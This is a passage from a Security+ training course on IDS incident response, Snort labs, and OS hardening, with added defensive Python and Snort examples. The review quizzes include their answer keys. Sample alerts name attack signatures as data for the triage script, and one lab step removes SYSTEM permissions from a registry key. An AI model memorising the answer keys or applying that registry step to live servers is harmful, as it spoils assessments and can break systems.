              Every IDS deployment should include two documents: an IDS monitoring policy
              and procedure, and an incident response plan. These documents are written to
              answer the "what now" questions:
                     • How will the IDS be monitored?
                     • Who will monitor it?
                     • How will the organization respond in the event of an alert?
                     • Who is going to fix the vulnerability?

              IDS monitoring
              It is an unpleasant fact that an IDS needs to be monitored. Early in their
              deployment, intrusion detection systems are likely to generate a high number of
              false positives; although these decrease as the IDS is tuned, each alarm still
              has to be investigated to work out how to tune it. Later, when the IDS
              installation is mature, an IDS alarm is a serious event that requires a
              response. Some network operations centers have 24 by 7 monitoring, but
              operations staff rarely have the experience or skills to deal with an intrusion.
              To monitor the IDS effectively, organizations need well-documented monitoring
              procedures that detail the actions for specific alerts. When operations
              personnel receive an IDS alert, they can refer to these procedures to determine
              whom to contact and what actions to take immediately, based on the type of
              alarm generated by the IDS.

                    Information security incident response team
                    Once an IDS alert has been received and the correct resources notified about the
                    intrusion, the incident-handling procedure comes into play. This procedure
                    determines the steps that response personnel follow in addressing the security
                    breach. The steps taken depend on the level of seriousness, so a classification
                    system is needed to categorize alarms. A sample alarm classification scheme
                    might look like this:
                        • Level 3: The least threatening type of alarm. A level 3 incident would
                          include a port scan or a single unauthorized attempt to telnet to a
                          network device.
                        • Level 2: More serious. A level 2 incident might include unsuccessful
                          attempts to obtain unauthorized access to systems. Continued level 3
                          activity could also be a reason for escalating to level 2.
                        • Level 1: The most serious type of attack. Level 1 incidents could include
                          major denial-of-service attacks, successful intrusions into systems, or
                          similar activities.
                    Each level of severity has its own sequence of actions to follow. Typically,
                    incidents are reported to a Security Incident Response Team (SIRT), whose
                    membership is defined in the incident-handling procedure document. The SIRT
                    assigns personnel who assemble all the resources needed to handle the reported
                    incident. The incident coordinator makes decisions about how policy, standards,
                    and procedures are interpreted when applied to the incident.
                    Typical objectives for the SIRT are:
                        • Determine how the incident happened.
                        • Establish a process for avoiding further exploitations of the same vulnerability.
                        • Avoid escalation and further incidents.
                        • Assess the impact and damage of the incident.
                        • Recover from the incident.
                        • Update procedures as needed.
                        • Determine who was responsible (if appropriate and possible).
                        • Involve legal counsel and law enforcement officials, as deemed appropriate by
                          the organization and the seriousness of the intrusion.
                    Depending on the seriousness of the attack, it is possible that only a subset of the above
                    actions would need to be addressed.
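                    As an added example (not part of the course text), the following Python script
                    applies the three-level scheme above to a handful of Snort alert lines in the
                    alert_fast format and escalates repeated level 3 activity from a single source to
                    level 2. The sample alert lines are constructed, and the classification keywords,
                    escalation threshold and per-level actions are assumptions standing in for what
                    an organization's own incident-handling procedure document would specify.

```python
"""Triage Snort alert_fast lines into the three-level incident scheme."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample alerts in Snort alert_fast style (not a real capture).
SAMPLE_ALERTS = """\
04/12-10:01:02.000000 [**] [1:1000001:1] PORTSCAN from host [**] [Classification: Attempted Information Leak] [Priority: 3] {TCP} 192.168.1.50:41000 -> 192.168.1.10:22
04/12-10:01:05.000000 [**] [1:1000002:1] TELNET login attempt [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.1.50:41001 -> 192.168.1.10:23
04/12-10:03:00.000000 [**] [1:1000001:1] PORTSCAN from host [**] [Classification: Attempted Information Leak] [Priority: 3] {TCP} 192.168.1.50:41002 -> 192.168.1.11:22
04/12-10:05:00.000000 [**] [1:1000003:1] WEB-IIS cmd.exe access [**] [Classification: Attempted User Privilege Gain] [Priority: 2] {TCP} 10.0.0.9:3345 -> 192.168.1.20:80
04/12-10:06:00.000000 [**] [1:1000004:1] DOS SYN flood [**] [Classification: Attempted Denial of Service] [Priority: 2] {TCP} 172.16.0.3:5555 -> 192.168.1.20:80
04/12-10:07:00.000000 [**] [1:1000005:1] ATTACK-RESPONSES id check returned root [**] [Classification: Successful Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.1.20:80 -> 10.0.0.9:3346
"""

ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.+?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?\[Priority:\s*(?P<pri>\d+)\]\s+"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+"
    r"(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)

# Classification keywords that fix the base level (assumption; most severe first).
LEVEL_1 = ("Successful", "Denial of Service")   # intrusions, major DoS
LEVEL_2 = ("Attempted User Privilege Gain", "Attempted Administrator Privilege Gain")

# Per-level actions; placeholders for what the procedure document would name.
ACTIONS = {
    1: "Page SIRT coordinator now; isolate host; preserve logs and disk image",
    2: "Notify SIRT on-call; block source at firewall pending review",
    3: "Log for review at next shift; tune signature if false positive",
}


def parse_alert(line):
    """Return the alert's fields as a dict, or None if the line is not an alert."""
    m = ALERT_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    # Snort omits the year; it defaults to 1900, and only time deltas are used.
    d["ts"] = datetime.strptime(d["ts"], "%m/%d-%H:%M:%S.%f")
    return d


def base_level(alert):
    """Map the Snort classification text onto the course's level 1..3 scheme."""
    cls = alert.get("cls") or ""
    if any(k in cls for k in LEVEL_1):
        return 1
    if any(k in cls for k in LEVEL_2):
        return 2
    return 3   # scans, a single telnet attempt, misc activity


def triage(lines, repeat_threshold=3, window=timedelta(minutes=10)):
    """Classify each alert; repeated level-3 events from one source become level 2."""
    recent_l3 = defaultdict(deque)   # source IP -> timestamps of recent level-3 events
    results = []
    for line in lines:
        a = parse_alert(line)
        if a is None:
            continue
        level, escalated = base_level(a), False
        if level == 3:
            q = recent_l3[a["src"]]
            q.append(a["ts"])
            while q and a["ts"] - q[0] > window:   # drop events outside the window
                q.popleft()
            if len(q) >= repeat_threshold:
                level, escalated = 2, True         # continued level-3 activity escalates
        results.append({"ts": a["ts"], "src": a["src"], "msg": a["msg"],
                        "level": level, "escalated": escalated, "action": ACTIONS[level]})
    return results


def highest_level(results):
    """Most serious level present (1 is most serious), or None if no alerts."""
    return min(r["level"] for r in results) if results else None


if __name__ == "__main__":
    for r in triage(SAMPLE_ALERTS.splitlines()):
        flag = " (escalated)" if r["escalated"] else ""
        print(f"L{r['level']}{flag} {r['src']:<14} {r['msg']:<42} -> {r['action']}")
```

                    Run against the sample lines, the third event from 192.168.1.50 is reported as
                    level 2 because it is the third level-3 alert from that source inside the ten
                    minute window, while the SYN flood and the root-shell response both land at
                    level 1. Threshold and window are the tuning knobs a monitoring procedure would
                    set.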

Do it!   E-1:   Discussing incident response
          Questions and answers
          1 SIRT stands for:
            A    Security Information Response Team
            B    System Information Response Team
            C    Security Incident Response Team
            D    None of the above

          2 What are some valuable steps in handling incidents?
            A    Determine how the incident happened.
            B    Establish a process for avoiding further exploitations of the same
                 vulnerability.
            C    Avoid escalation and further incidents.
            D    Assess the impact and damage of the incident.
            E    Recover from the incident.
            F    Update procedures as needed.
            G    Determine who was responsible (if appropriate and possible).
            H    All of the above.

          3 What information should be included in the IDS monitoring procedures?

            The procedures should indicate the appropriate response—whom to contact and what
            actions should be taken immediately—based on the type of alarm generated by the IDS.


Unit summary: Intrusion detection
Topic A             In this topic, you learned about intrusion detection systems and characteristics of
                    intrusion detection products. You learned that intrusion detection provides monitoring
                    of network resources to detect intrusions and attacks that were not stopped by the
                    preventative techniques.
Topic B             In this topic, you learned about network-based and host-based intrusion detection
                    systems and how these products are deployed for maximum effect. You learned that,
                    although both technologies have their own strengths and weaknesses, they offer
                    complementary capabilities to each other and to firewalls and can significantly add to
                    network security when properly tuned and vigilantly monitored.
Topic C             In this topic, you learned about passive and active IDS. You learned that active IDS can
                    stop or prevent an attack by blocking offending traffic at the router or firewall, while
                    passive IDS simply logs the attack and alerts administrators. You also learned about the
                    differences between anomaly-based and signature-based IDS.
Topic D             In this topic, you learned about honeypots. You learned that while honeypots are still
                    not commonly deployed in business networks, they are gaining popularity and have the
                    capability of adding to network security by gathering information about intruders and
                    their methods of gaining entry into the network.
Topic E             In this topic, you learned about IDS monitoring and incident response. You discussed
                    the importance of having well-documented procedures and a well-trained response team
                    in place before an incident occurs.

                    Review questions
                     1 What is the defense in depth security strategy?
                        A multi-layered security approach that uses multiple techniques such as preventative
                        technologies, security monitoring, and attack response to provide a robust security architecture.

                     2 Specify whether each of the following describes a true or false positive or negative.
                        Occur when the IDS correctly identifies undesirable traffic.
                        True positive

                        Occur when the IDS correctly identifies normal traffic.
                        True negative

                        Occur when the IDS incorrectly identifies normal traffic as an attack.
                        False positive

                        Occur when the IDS incorrectly identifies an attack as normal traffic.
                        False negative

                     3 False negatives imply that the IDS failed to detect an attack. True or false?
                        True

                     4 False positives happen when the IDS mistakenly reports certain benign activity as
                       malicious. True or false?
                        True

 5 What is the difference between host-based and network-based intrusion detection
   systems?
   Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity
   on a particular host machine.

 6 NIDS typically use two NICs. What is each used for?
   One operates in promiscuous mode to sniff passing traffic and the other is an administrative NIC
   that is used to send data such as alerts to a centralized management system.

 7 Where are the typical locations for IDS sensors?
   Just inside the firewall, on the DMZ, or on any subnets containing mission-critical servers.

 8 What are the typical reaction types for a network IDS?
   TCP resets, IP session logging, and shunning or blocking.

 9 HIDS audit log files, monitor file checksums, evaluate requests by application for
   system resources, and monitor system processes for suspicious activities. True or
   false?
   True

10 HIDS can only detect intrusions after the fact rather than proactively protecting the
   host. True or false?
   False

11 What are the two main types of host-based IDS?
   Host wrappers and agent-based software

12 Compare passive and active IDS.
   Passive systems log security events, alert administrators when an attack occurs, and record the
   offending traffic for analysis, but do not take any preventive action to stop the attack. Active
   systems have all the logging, alerting, and recording features of passive IDS, with the additional
   ability to take action against the offending traffic.

13 Compare signature-based and anomaly-based IDS.
   Signature detection is achieved by creating models of attacks, also called signatures. As events
   are monitored, they are compared to a model to determine whether the event qualifies as an
   intrusion. Anomaly detection takes the opposite position from signature detection. Rather than
   operate from signatures that define misuse or attacks on the network, anomaly detection creates
   a model of normal use and looks for activity that does not conform to that model.

14 What is typically the goal of deploying honeypots?
   To gather information on hacker techniques, methodology, and tools.

15 Which of the following is true when deploying honeypots?
   A   Honeypots must attract the attacker without tipping them off.
   B Honeypots should never use the normal operating system.
   C Only real data is of interest to attackers so phony data should never be used.
   D Honeypots should only be placed outside the firewall.

                    16 Every IDS deployment should include documents describing the monitoring policy
                       and procedure, and an incident response plan. True or false?
                        True

                    17 Early on in their deployment, intrusion detection systems are likely to generate a
                       high number of false negatives. True or false?
                        False. When first set up, they are likely to generate false positives.

                    18 A well-documented monitoring procedure specifies whom operations personnel
                       should contact. Information about what to do about the intrusion is not included in
                       this document. True or false?
                        False. The document does include this information.

                    19 Deployment of a honeypot is seen by some as entrapment and, according to them, is
                       therefore unethical. True or false?
                        True

                    20 Honeypots cannot be used to attack legitimate systems. True or false?
                        False. If you do not carefully structure the honeypot environment, attackers can launch attacks
                        against your network or other networks from this environment.


                    Independent practice activities

                    Installing Snort on Windows-based systems
                    Snort is an example of an IDS solution. After completing this activity, you’ll know how
                    to install Snort for Windows.
                    Note: The servers used in this activity will be referred to as Server-X and Server-Y.
                    Please substitute the names of your servers for these names.
                     1 Log on to Server-X as Administrator. (If necessary)
                     2 Verify that WinPcap is installed on the server. (If it isn’t, download
                       WinPcap_3_1.exe according to your Instructor’s direction. Double-click the
                       WinPcap_3_1.exe file, click Next three times, click OK and reboot Server-X and
                       log on as Administrator.)
                     3 Create a folder called snort on C:\ (your local hard drive).
                     4 Download snort_243_Installer.exe from www.snort.org/dl/binaries/win32 to the
                       snort folder.
                     5 Double-click the snort_243_Installer.exe file to start the installation. Accept all
                       defaults and choose C:\snort as the destination folder.
                     6 Rename the snort.conf file in C:\snort\etc to snort.old.
                     7 Open snort.old with Wordpad (not Notepad).
                     8 Save the snort.old file as snort.conf in a text format.
                     9 Close Wordpad.
                    10 Rename the snort.conf.txt file to snort.conf.
                    11 Click Yes to accept the format change.
                    12 Repeat steps 1-11 above on Server-Y.

Capturing packets with Snort
After completing this activity, you’ll be able to understand how to use Snort to capture
data packets, view the contents of the data packets, and create log files.
Note: The servers used in this activity will be referred to as Server-X and Server-Y.
Please substitute the names of your servers for these names.
 1 On Server-X, click Start, Run, and type cmd.
 2 Click OK.
 3 Type cd \snort\bin and press Enter.
 4 Enter snort -W. You'll see a list of the available interfaces, each with a number
   assigned to it (1, 2, and so on).
 5 Type snort -v -i followed by the number of the interface you want to listen to. For
   example, you might type snort -v -i 2 to listen to interface 2.
 6 Press Enter. You’ll see a screen similar to the one shown in Exhibit 12-4 below.




Exhibit 12-4: The snort interface initialization screen

 7 On Server-Y, click Start, Run, and type cmd.
 8 Click OK.
 9 Type ping Server-X and press Enter.
10 On Server-X, view the results, as shown in Exhibit 12-5. Notice the ECHO and
   ECHO REPLY.




                    Exhibit 12-5: A Snort ping capture

                    11 On Server-X, press Ctrl+C to view the statistics, as shown in Exhibit 12-6. Notice
                       that the protocols used were ICMP and ARP.




                    Exhibit 12-6: Snort ping capture statistics

                    12 On Server-X, at the command line enter snort -v -d -i followed by the interface
                       number to view the packet data.
                    13 On Server-Y, enter ping Server-X.
                    14 On Server-X, view the results. You’ll see a screen similar to the one shown in
                       Exhibit 12-7.




Exhibit 12-7: A Snort ping capture with data

15 On Server-X, press Ctrl+C.
16 On Server-X, enter snort -dev -l \snort\log -K ascii -i followed by the interface
   number to log results to a log file.
17 Ping Server-X from Server-Y.
18 On Server-X, press Ctrl+C.
19 Navigate to the C:\snort\log folder and examine the contents. Use Notepad to open
   the files in the subfolder(s).
20 Repeat steps 1 through 19 above on Server-Y.
21 Close all windows.

Creating a Snort rule set
In this activity, you’ll create a simple Snort rule to alert you when the ICMP protocol is
used. After completing this activity, you’ll be able to create a Snort rule set, and test the
rules set on the network.
Note: The servers used in this activity will be referred to as Server-X and Server-Y.
Please substitute the names of your servers for these names.
 1 Log on to Server-X as Administrator. (If necessary.)
 2 Click Start, Run…, and type notepad.
 3 Click OK.
 4 Enter the information shown in Exhibit 12-8.




                    Exhibit 12-8: A Snort rule set

                     5 Save the file as c:\snort\new.rules. Close Notepad.
                     6 Rename c:\snort\new.rules.txt to c:\snort\new.rules. Accept the format change
                       when prompted.
                     7 On Server-X, open a Command window.
                     8 At the command line, enter cd \snort\bin.
                      9 At the command line, enter snort -c \snort\new.rules -K ascii -l \snort\log -i
                        followed by the interface number.
                    10 From Server-Y, open Internet Explorer and enter http://Server-X’s IP address in
                       the address box. Press Enter.
                    11 On Server-X, press Ctrl+C.
                    12 Navigate to the C:\snort\log folder.
                    13 In Server-Y’s subfolder, examine the Web Traffic Logged in the TCP_*-80.ids
                       files. It should look similar to Exhibit 12-9.




                    Exhibit 12-9: A Snort log file containing Web traffic

14 On Server-X, change to the c:\snort\bin directory and then enter snort -c
   \snort\new.rules -K ascii -l \snort\log -i followed by the interface number.
15 On Server-Y, ping Server-X.
16 On Server-X, press Ctrl+C.
17 Navigate to the C:\snort\log folder.
18 Examine the contents of the alert.ids file. It should look similar to the one shown in
   Exhibit 12-10.




Exhibit 12-10: A Snort ICMP traffic alert log

19 Repeat steps 1-18 above on Server-Y.
20 Close all windows and log off Server-X and Server-Y.
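The rule set that step 4 asks you to type in is shown only in Exhibit 12-8, which is not
reproduced here. As an added illustration (not the contents of the exhibit), the following
two-rule file does what steps 13 and 18 expect to find: a log rule that writes Web packets
from Server-Y into its per-address subfolder under \snort\log, and an alert rule that sends
every ICMP packet to alert.ids. The sid values are arbitrary numbers in the local range and
are an assumption.

```snort
# Illustrative c:\snort\new.rules (added example; not the exhibit's contents).
# Log every TCP packet destined for port 80. With -K ascii -l \snort\log these
# packets appear under \snort\log\<source IP>\TCP_<sport>-80.ids.
log tcp any any -> any 80 (msg:"Web traffic logged"; sid:1000001; rev:1;)

# Alert on any ICMP packet (echo and echo reply alike); alerts go to alert.ids.
alert icmp any any -> any any (msg:"ICMP traffic detected"; sid:1000002; rev:1;)
```

Because the log rule matches only packets going to port 80, the server's replies are not
logged; change the direction operator to <> if you want both sides of the conversation.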


Unit 13
Security baselines
                     Unit time: 180 minutes

                     Complete this unit, and you’ll know how to:

                     A Gain an understanding of OS/NOS
                        vulnerabilities and hardening practices.

                     B Explore common network hardening
                        practices, including firmware updates,
                        access control lists, and configuration best
                        practices.

                     C Harden application-layer services—such as
                        Web, e-mail, FTP, DNS, file/print, DHCP,
                        and database repositories—against attacks.

                     D Explain how to properly configure
                        workstations and servers and implement
                        personal firewall software and antivirus
                        packages.


Topic A: OS/NOS hardening
                     This topic covers the following CompTIA Security+ exam objectives:

                      #      Objective

                      1.3    Non-essential Services and Protocols – Disabling unnecessary systems / process / programs.

                      3.5    Understand the following concepts of Security Baselines, be able to explain what a Security
                             Baseline is, and understand the implementation and configuration of each kind of intrusion
                             detection system
                              • OS / NOS (Operating System / Network Operating System) Hardening
                                  • File System
                                  • Updates (Hotfixes, Service Packs, Patches)




                     Securing the operating system
Explanation          Operating system/network operating system (OS/NOS) hardening is the process of
                     modifying an operating system’s default configuration to make it more secure from
                     outside threats. This process might include removing unnecessary programs and
                     services, setting access privileges, and applying patches to the system kernel to limit
                     vulnerability.
                     The OS can essentially be considered the brain of a typical computer system. Operating
                     systems not only establish communication between the hardware and the software
                     running on it, but also manage and facilitate the distribution of system resources across
                     different tasks (as shown in Exhibit 13-1).




                     Exhibit 13-1: OS/NOS hardening
                                                              Security baselines    13–3

It’s extremely important, therefore, for system administrators to protect the integrity and
availability of operating systems from outside threats. Actions that could disrupt the
functionality of a system can be categorized as follows:
    • Attacks—These are intentional acts by malicious individuals either to gain
      unauthorized access to user data and system resources or to compromise other
      targets.
    • Malfunctions—These are hardware or software failures that may prevent a
      system from performing its tasks.
    • Errors—These are unintentional acts, by external or internal users, that may
      adversely affect the functionality of a system.

Best practices
Although it’s almost impossible to achieve complete security of a system when it’s
deployed as part of a network, IT managers can follow certain guidelines to safeguard
the system from intruders. Following is a common list of best practices for operating
system hardening:
    • Identify and remove unused applications and services, which, if compromised,
      can reveal sensitive information about a system. Remove unused or unnecessary
      file shares.
    • Implement and enforce strong password policies. Force periodic password
      changes. Remove or disable all expired or unneeded accounts.
    • Limit the number of administrator accounts available. Set necessary privileges to
      ensure that resources are accessible on an as-needed basis.
    • Set account lockout policies to discourage password cracking.
    • Keep track of the latest security updates and hotfixes. Apply vendor-suggested
      upgrades and patches as they are made available.
    • Back up the system on a periodic basis for restoration in case of emergency.
    • Log all user account and administrative activity so you can conduct forensic
      analysis if the system is compromised.

Documentation
Keeping an external log of each critical system can increase system integrity and make
future security-related maintenance much simpler. This hard log should include a list of
all software and version numbers that are installed on the system. As users, groups, and
access privileges are defined, and other critical decisions are made during the baselining
process, they should be recorded in this document. Records of all backups and upgrades
should also be maintained in this single reference. When a security patch is
recommended for a certain combination of operating system and applications, you
won’t need to dig around in your active system to see if it applies; simply refer to the
paper logs. A recommended method is to use a composition book for each critical
system. It’s obvious when pages are removed (they never should be), and it’s easy to
take with you to analyze.

Do it!   A-1:   Using the Microsoft Baseline Security Analyzer
          Here's how / Here's why
           1 Log on to your server as Administrator.
             Microsoft Baseline Security Analyzer (MBSA) can scan local and remote
             machines for security issues with Microsoft Windows NT 4, Windows 2000,
             Windows Server 2003, Windows XP, IIS, SQL Server, Internet Explorer, and
             Office. A detailed report is generated after the scan is complete. In this
             activity, you'll install MBSA and view the results.

           2 Download mbsasetup-en.msi according to your Instructor's directions.
             (See the classroom setup instructions for the location of the download file.
             To download this file from Microsoft's web site, go to
             www.microsoft.com/downloads and search using the keyword mbsa.)

           3 Double-click the mbsasetup-en.msi file, then click Next to start the MBSA
             Setup wizard.

           4 Select I accept the license agreement, then click Next.

           5 Click Next to use the default folder.

           6 Click Install.

           7 Click OK to acknowledge that the installation has finished.

           8 Click Start, then choose All Programs, Microsoft Baseline Security Analyzer
             2.0, to start the program.

           9 Click Scan a computer. Maximize the window if necessary.

          10 Click Start scan (in the lower-left corner of the window). Security update
             information downloads from the Internet and the scan begins. Note that this
             process may take some time to complete.

          11 After the scan is complete, view the report. The report shows what was
             scanned, the results of the scan, and how to fix any problems.

          12 Close all windows.

Do it!              A-2:      Discussing system hardening
                      Questions and answers
                       1 Which of the following should be included in a list of system hardening best
                         practices? (Choose all that apply.)
                          A    Deny data access to all users but a select few.
                          B    Identify and remove unused applications and services.
                          C    Implement and enforce strong password policies.
                          D    Limit the number of administrator accounts.

                       2 Which of the following are not actions that could disrupt the functionality of a
                         system?
                          A    Attacks
                          B    Malfunctions
                          C    Errors
                          D    Data errors

                       3 Which of the following three statements about OS/NOS hardening is not true?
                          A    OS/NOS hardening includes removal of unnecessary programs.
                          B    OS/NOS hardening includes application hardening.
                          C    OS/NOS hardening includes applying or adding patches to the system kernel.

              File systems
Explanation   File systems organize and store the data that applications read from and write to
              their supporting disk drives. They require special attention when you're securing
              the OS: strong file-system security not only stops tampering by insiders but also
              limits what an attacker who has gained access to the system, but not to the files,
              can do with it.

              Access privileges
              Operating systems provide the capability to set access privileges for files, directories,
              devices, and other data or code objects. Setting privileges and access controls protects
              information stored on the computer. Common privileges that can be set on files and
              directories are Read, Write, and Execute privileges.
                  • Denying Read access protects confidentiality of information.
                  • Denying Write access protects the integrity of information from unauthorized
                    modification.
                  • Restricting execution privileges of most system-related tools to system
                    administrators can prevent users and attackers from making intentional or
                    unintentional configuration changes that could damage security.
              The principle of least privilege states that users should have the minimum amount of
              access needed to perform their jobs. Although it may be easier to give all employees
              access to a file repository so that they can easily share a file as it’s being modified, this
              practice opens up many possibilities for a breach of security.
              It might also be necessary to distinguish local access privileges from network access
              privileges. Application programs may request and be granted increased access
              privileges for some of their automated operations. On the other hand, a system
              administrator may want to limit users’ privileges based on their required scope. This can
              be done in a number of ways, as outlined in the following sections.

              Setting user and group privileges
              To assist in privilege assignment, the administrator should determine user groups and
              object groups, and identify required access for each object (file, directory, device) by
              each user group within the system.
              When setting privileges for users, you can usually simplify both the initial task and
              future updates by grouping users by common needs. Most operating systems allow
              rights to be granted to a group, which then propagates those privileges to all members of
              the group.
              For instance, all corporate accountants may have access to a folder of resources,
              accounting software, and several printers in a section of the building. Rights to each of
              those resources could be granted to the accounting group, and all accountants could be
              added to that group. If a new, generally available accounting resource is added, an
              administrator need only add it to the accounting group for all accountants to have
              access. Similarly, when an accountant is transferred to a different division, his or her
              user account is removed from the accounting group, thereby revoking in a single action
              the multiple accounting privileges that are no longer needed.
              Using groups does not prevent you from granting additional rights to a single user.
              Those would simply be added directly to the user account. Be sure to identify rights that
              are made available to a set of users because those users might be better represented by a
              group of users. It’s also possible for a single user to gain privileges via membership in
              multiple groups in addition to those rights granted explicitly.
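              The group-based assignment described above, as an added worked example (it is not
              code from the course): rights are granted to groups, a user's effective rights are the
              union of every group he or she belongs to plus any rights granted directly, and moving an
              accountant to another division revokes all accounting rights in one action. Group, user
              and object names are constructed for the illustration.

```python
"""Group-based privilege assignment (constructed example, not from the course).

Rights are granted to groups; a user gets the union of the rights of every
group they belong to, plus any rights granted to the account directly.
Removing a user from a group revokes all of that group's rights in one step.
"""
from collections import defaultdict


class PrivilegeDirectory:
    """Tracks group membership and the rights granted to groups and users."""

    def __init__(self):
        self.group_rights = defaultdict(set)   # group -> {(object, right)}
        self.user_rights = defaultdict(set)    # user  -> {(object, right)}
        self.members = defaultdict(set)        # group -> {user}

    def grant_group(self, group, obj, right):
        self.group_rights[group].add((obj, right))

    def grant_user(self, user, obj, right):
        """Explicit per-user grant; used sparingly, otherwise a group fits better."""
        self.user_rights[user].add((obj, right))

    def add_member(self, group, user):
        self.members[group].add(user)

    def remove_member(self, group, user):
        self.members[group].discard(user)

    def effective_rights(self, user):
        """Union of direct grants and the grants of every group the user is in."""
        rights = set(self.user_rights[user])
        for group, users in self.members.items():
            if user in users:
                rights |= self.group_rights[group]
        return rights

    def has_right(self, user, obj, right):
        return (obj, right) in self.effective_rights(user)


def build_demo():
    """Constructed sample: the accounting group from the text plus a sales group."""
    d = PrivilegeDirectory()
    for obj in ("acct_share", "acct_software", "printer_2f"):
        d.grant_group("accounting", obj, "read")
    d.grant_group("accounting", "acct_share", "write")
    d.grant_group("sales", "sales_share", "read")
    d.add_member("accounting", "alice")
    d.add_member("accounting", "bob")
    d.add_member("sales", "alice")                # alice is in two groups
    d.grant_user("bob", "audit_export", "read")   # explicit right for one user
    return d


def transfer(d, user, old_group, new_group):
    """Transfer between divisions: one removal revokes every old-group right."""
    d.remove_member(old_group, user)
    d.add_member(new_group, user)
    return d.effective_rights(user)


if __name__ == "__main__":
    d = build_demo()
    print("alice before:", sorted(d.effective_rights("alice")))
    print("alice after: ", sorted(transfer(d, "alice", "accounting", "sales")))
```

              Adding a new accounting resource means one `grant_group` call; no per-user change is
              needed, which is the maintenance benefit the text describes.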
13–8          CompTIA Security+ Certification

                           Configuring access controls
 Instructor note: Emphasize that these are only guidelines, and adjustments might be needed to suit a
 particular environment. Remind students that the ultimate goal is to provide users with the least
 amount of access needed to accomplish their jobs.
                           When creating user groups, a system administrator configures the operating system to
                           recognize the user groups, and then assigns individual users to the appropriate groups.
                           Then, the system administrator configures access controls for all protected files,
                           directories, devices, and other objects.
                           The administrator should document all the configured permissions along with the
                           rationales for them. Following are some of the common practices for setting file and
                           data privileges:
                               • Restrict access of operating system source files, configuration files, and their
                                 directories to authorized system administrators.
                               • For UNIX systems, there should be no world-writable files unless specifically
                                 required by necessary application programs. For Windows NT-based systems,
                                 there should be no permissions allowing the Everyone group to modify files.
                               • For UNIX systems, if possible, mount file systems as read only and nosuid to
                                 preclude unauthorized changes to files and programs.
                               • Assign an access permission of immutable to all kernel files if it’s supported by
                                 the operating system (such as Linux).
                               • Establish all log files as “append only” if that option is available.
                               • Prevent users from installing, removing, or editing scripts without administrative
                                 review. Otherwise, malicious users could exploit these files to gain unauthorized
                                 access to data and system resources.
                               • Pay attention to access control inheritance when defining categories of files and
                                 users. Ensure that you configure the operating system so that newly created files
                                 and directories inherit appropriate access controls, and that access controls
                                 propagate down the directory hierarchies as intended when you assign them.
                                 Administrators should disable a subdirectory’s ability to override top-level
                                 security directives unless that override is required. Malicious users can exploit a
                                 failure to use such practices and gain unauthorized access to other parts of the
                                 system.
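                           An added example (not code from the course) of checking two of the UNIX practices
                           above: it walks a directory tree and reports world-writable files and directories and
                           set-UID/set-GID programs. The sample tree it builds under a temporary directory is
                           constructed for the illustration; the file names in it are not from the course.

```python
"""Audit a directory tree for world-writable and set-UID/set-GID objects.

Constructed example; not from the course. Builds a small sample tree in a
temporary directory so that it runs offline.
"""
import os
import stat
import tempfile


def audit_tree(root):
    """Walk root and return a sorted list of (relative_path, finding) tuples."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue                  # a symlink's own mode bits carry no meaning
            mode = st.st_mode
            rel = os.path.relpath(path, root)
            # World-writable: anyone may modify the file (or add/remove entries in a
            # directory).  A sticky-bit directory such as /tmp is the accepted exception.
            if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
                findings.append((rel, "world-writable"))
            if mode & stat.S_ISUID:
                findings.append((rel, "setuid"))
            if mode & stat.S_ISGID and not stat.S_ISDIR(mode):
                findings.append((rel, "setgid"))
    return sorted(findings)


def build_sample_tree():
    """Create a constructed sample tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="perm_audit_")
    etc = os.path.join(root, "etc")
    os.mkdir(etc)
    good = os.path.join(etc, "app.conf")      # owner rw, others read-only: fine
    bad = os.path.join(etc, "world.conf")     # other-writable: flagged
    suid = os.path.join(root, "helper")       # set-UID program: flagged
    for path in (good, bad, suid):
        with open(path, "w") as fh:
            fh.write("# constructed sample\n")
    os.chmod(good, 0o644)
    os.chmod(bad, 0o666)
    os.chmod(suid, 0o4755)
    os.chmod(etc, 0o755)
    return root


if __name__ == "__main__":
    for rel, finding in audit_tree(build_sample_tree()):
        print(f"{finding:15} {rel}")
```

                           Run against a real configuration directory, the output is the list an administrator
                           would review before tightening modes; on a system with a nosuid mount, the set-UID
                           bit is still visible to this check even though the kernel ignores it.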

                           Implementing access control with Windows Server 2003 security templates
                           One of the more difficult tasks for an administrator is determining the appropriate
                           security settings for a network. There are so many possibilities that it’s very easy to
                           miss an important setting, often resulting in a network full of security holes. Microsoft
                           has created security templates to assist administrators with this task. In addition,
                           Microsoft gives administrators the ability to create custom templates.

Do it!                     A-3:    Defining security templates in Windows Server 2003
                            Here’s how                                 Here’s why
                             1 Choose Start, Run…

                                Type mmc and press Enter

                             2 Choose File, Add/Remove Snap-in…        To open the Add/Remove Snap-in window.

                             3 Click Add…                              To open the Add Standalone Snap-in window.

                             4 Under Snap-in, select Security Templates

                                Click Add

                             5 Click Close

                             6 Click OK

                             7 Expand Security Templates

                             8 Expand C:\Windows\Security\Templates

                             9 Right-click C:\Windows\Security\Templates

                                Choose New Template…                   From the shortcut menu.

                            10 Enter My Template                       For the template name.

                                Leave the description blank

                                Click OK

                            11 Select and then expand My Template

                            12 Select and then right-click             To display the shortcut menu.
                                Restricted Groups

                                Choose Add group…                      To open the Add Group dialog box.

                            13 Type Administrators                     To specify the group object.

                            14 Click OK twice

                            15 Select and then right-click Registry    To display the shortcut menu.

                                Choose Add Key…

                            16 Under Registry, select MACHINE

                            17 Click OK

                            18 Remove the CREATOR OWNER and SYSTEM
                                groups

                                Click OK

                            19 Click OK                                To Configure this key then Propagate inheritable
                                                                       permissions to all subkeys.

                            20 Close the Console1 window

                            21 Save the console with the name
